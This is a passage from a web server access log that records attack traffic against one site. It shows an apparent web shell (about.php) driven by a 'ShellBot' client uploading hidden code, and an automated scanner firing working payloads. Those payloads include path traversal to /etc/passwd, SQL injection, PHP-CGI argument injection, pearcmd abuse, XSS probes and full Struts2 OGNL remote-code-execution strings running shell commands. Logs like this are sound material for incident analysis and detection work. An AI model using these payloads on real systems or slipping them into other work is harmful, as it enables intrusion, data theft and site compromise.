Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:41:13 -0400] "GET /640275/about.php?ac=p&api=http://6146-ch4-v288.img7yahoo.com&path=84421486888f873a2c81bee9250ef98a&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 36 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:41:18 -0400] "GET /640275/about.php?ac=i_old_v4&api=http://6146-ch4-v288.img7yahoo.com&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 21 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:41:55 -0400] "GET /640275/about.php?upload&q=%E0%A6%95home%E0%A6%95megavujh%E0%A6%95mgrokokbet%E0%A6%97id HTTP/1.1" 200 958 "https://mgrokokbet.id/640275/about.php?p=%E0%A6%95home%E0%A6%95megavujh%E0%A6%95mgrokokbet.id" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:42:00 -0400] "POST /640275/about.php?upload&q=%E0%A6%95home%E0%A6%95megavujh%E0%A6%95mgrokokbet%E0%A6%97id HTTP/1.1" 200 978 "https://mgrokokbet.id/640275/about.php?upload&q=%E0%A6%95home%E0%A6%95megavujh%E0%A6%95mgrokokbet%E0%A6%97id" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:43:11 -0400] "GET /640275/about.php?ac=u-about&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:45:27 -0400] "GET /about.php?ac=upload_hidden_code&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:47:19 -0400] "GET /640275/about.php?ac=upload_hidden_code&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:36 -0400] "POST /guest_auth/guestIsUp.php HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "POST /bsh.servlet.BshServlet HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "POST /mobile/plugin/browser.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "POST /uapjs/jsinvoke/?action=invoke HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "POST /zentao/user-login.html HTTP/1.1" 200 0 "https://mgrokokbet.id/zentao/user-login.html" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - guest [23/Apr/2025:23:39:38 -0400] "POST /WEB_VMS/LEVEL15/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [23/Apr/2025:23:39:40 -0400] "POST /BOCB6GUjxZbF.jsp?error=bsh.Interpreter HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:40 -0400] "POST /cgi-bin/rpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [23/Apr/2025:23:39:42 -0400] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:42 -0400] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [23/Apr/2025:23:39:42 -0400] "POST /seeyon/htmlofficeservlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.35" 154.84.62.234 - - [23/Apr/2025:23:39:40 -0400] "POST /index.php?s=/home/page/uploadImg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.24" 154.84.62.234 - - [23/Apr/2025:23:39:44 -0400] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [23/Apr/2025:23:39:44 -0400] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:45 -0400] "POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:45 -0400] "GET /seeyon/test123456.jsp?pwd=asasd3344&2w9rfc7PVHkWEq55m9su1RnRuAS=ipconfig HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.5.20" 154.84.62.234 - - [23/Apr/2025:23:39:42 -0400] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:47 -0400] "GET /public/index.php/home/file/user_pics HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [23/Apr/2025:23:39:48 -0400] "GET /images/logo/logo-eoffice.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" 154.84.62.234 - - [23/Apr/2025:23:41:51 -0400] "GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:41:54 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [23/Apr/2025:23:41:57 -0400] "GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+iQC0Xf4xCI.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [23/Apr/2025:23:57:40 -0400] "GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [23/Apr/2025:23:57:40 -0400] "POST /index.php/User/doLogin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.25" 154.84.62.234 - - [24/Apr/2025:00:05:37 -0400] "GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.17" 154.84.62.234 - - [24/Apr/2025:00:05:37 -0400] "POST /scripts/setup.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363" 154.84.62.234 - - [24/Apr/2025:00:05:38 -0400] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:00:05:38 -0400] "POST /axis2/axis2-admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:00:05:38 -0400] "POST /axis2-admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 154.84.62.234 - - [24/Apr/2025:00:05:40 -0400] "POST /login.action HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:00:06:22 -0400] "GET /login-x.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:06:22 -0400] "GET /users/sign_in HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:09:39 -0400] "POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:00:12:29 -0400] "GET /reports/rwservlet/showenv HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:00:12:29 -0400] "GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.20" 154.84.62.234 - - [24/Apr/2025:00:12:32 -0400] "GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:12:32 -0400] "GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:00:20:52 -0400] "POST /user.action HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.20" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.20.13 (KHTML, like Gecko) Version/17.7.74 Safari/616.20.13" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:23:27 -0400] "GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:00:26:12 -0400] "GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4) AppleWebKit/616.33 (KHTML, like Gecko) Version/17.6 Safari/616.33" 154.84.62.234 - - [24/Apr/2025:00:26:12 -0400] "GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:00:26:13 -0400] "GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 ZOE/2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:00:26:13 -0400] "GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:00:26:13 -0400] "GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:00:26:14 -0400] "GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:00:26:14 -0400] "GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:26:14 -0400] "GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.23" 154.84.62.234 - - [24/Apr/2025:00:26:17 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:26:21 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:00:26:25 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5) AppleWebKit/617.19 (KHTML, like Gecko) Version/17.6.47 Safari/617.19" 154.84.62.234 - - [24/Apr/2025:00:28:45 -0400] "GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt 